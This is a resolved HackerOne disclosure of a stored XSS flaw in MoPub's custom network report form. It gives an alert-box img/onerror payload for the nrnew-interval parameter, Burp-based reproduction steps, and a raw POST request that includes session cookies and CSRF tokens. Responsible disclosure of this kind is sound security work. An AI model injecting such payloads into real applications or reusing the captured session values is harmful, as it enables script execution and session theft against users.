Stored XSS in https://app.mopub.com
Medium
Vulnerability Details
**Vulnerable URL**
https://app.mopub.com/reports/custom/
**XSS Payload:**
"><img src=x onerror=alert(domain)>
**Parameter**
nrnew-interval
## Steps To Reproduce:
1. Login with your credentials.
2. Go to URL: https://app.mopub.com/reports/custom/
3. Click on New Network Report => Create a new network performance report.
4. Start Burp suite proxy and intercept on.
5. Click on Run and Save button. intercept the request.
6. Enter above payload in vulnerable parameter.
7. You will notice that xss will execute.
## POST Request
```
POST /reports/custom/add_network_report/ HTTP/1.1
Host: app.mopub.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://app.mopub.com/reports/custom/
X-CSRFToken: Kamf4foDZKEQRxCOVLTalPmO0BKqNhdgexLNcHl3Vv1C4K2Dt6ckPmlIEhtYwHwe
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------68352596720712
Content-Length: 838
Connection: close
Cookie: _gcl_au=1.1.1079813240.1562926835; _ga=GA1.2.333952053.1562926836; _gid=GA1.2.668572806.1562926836; csrftoken=Kamf4foDZKEQRxCOVLTalPmO0BKqNhdgexLNcHl3Vv1C4K2Dt6ckPmlIEhtYwHwe; mp_mixpanel__c=1; mp__mixpanel=%7B%22distinct_id%22%3A%20%2216bea510e694ee-0d3dfa328c7f088-4c312f7f-e1000-16bea510e6a21%22%2C%22%24device_id%22%3A%20%2216bea510e694ee-0d3dfa328c7f088-4c312f7f-e1000-16bea510e6a21%22%2C%22accountKey%22%3A%20%22%22%2C%22accessLevel%22%3A%20%22%22%2C%22%24initial_referrer%22%3A%20%22https%3A%2F%2Fwww.mopub.com%2F%22%2C%22%24initial_referring_domain%22%3A%20%22www.mopub.com%22%7D; sessionid=foc4dxhc0fpft4k0v55llxgdrdxz18ap; mp_c99579c4804fba6b8aeed7a911581652_mixpanel=%7B%22distinct_id%22%3A%20%22285f16e8e3a64ffc9bcc629faccb3d23%22%2C%22%24device_id%22%3A%20%2216bea511f491de-05975356a250958-4c312f7f-e1000-16bea511f4a4b3%22%2C%22accountKey%22%3A%20%229ea06dcced234a41a7bf431dd78ac134%22%2C%22accessLevel%22%3A%20%22member%22%2C%22%24initial_referrer%22%3A%20%22https%3A%2F%2Fapp.mopub.com%2Faccount%2Flogin%2F%3Fnext%3D%2Fdashboard%2F%22%2C%22%24initial_referring_domain%22%3A%20%22app.mopub.com%22%2C%22__mps%22%3A%20%7B%7D%2C%22__mpso%22%3A%20%7B%7D%2C%22__mpus%22%3A%20%7B%7D%2C%22__mpa%22%3A%20%7B%7D%2C%22__mpu%22%3A%20%7B%7D%2C%22__mpr%22%3A%20%5B%5D%2C%22__mpap%22%3A%20%5B%5D%2C%22%24user_id%22%3A%20%22285f16e8e3a64ffc9bcc629faccb3d23%22%7D
-----------------------------68352596720712
Content-Disposition: form-data; name="nrnew-saved"
on
-----------------------------68352596720712
Content-Disposition: form-data; name="nrnew-name"
todayxss1111222
-----------------------------68352596720712
Content-Disposition: form-data; name="nrnew-recipients"
[email protected]
-----------------------------68352596720712
Content-Disposition: form-data; name="nrnew-interval"
custom"><img src=x onerror=alert(cookie)>
-----------------------------68352596720712
Content-Disposition: form-data; name="nrnew-start"
07/17/2019
-----------------------------68352596720712
Content-Disposition: form-data; name="nrnew-end"
07/19/2019
-----------------------------68352596720712
Content-Disposition: form-data; name="nrnew-sched_interval"
none
-----------------------------68352596720712--
```
{F528288}
{F528287}
## Impact
with the help of this attack, an attacker can execute malicious javascript on an application
Actions
View on HackerOneReport Stats
- Report ID: 642281
- State: Closed
- Substate: resolved
- Upvotes: 21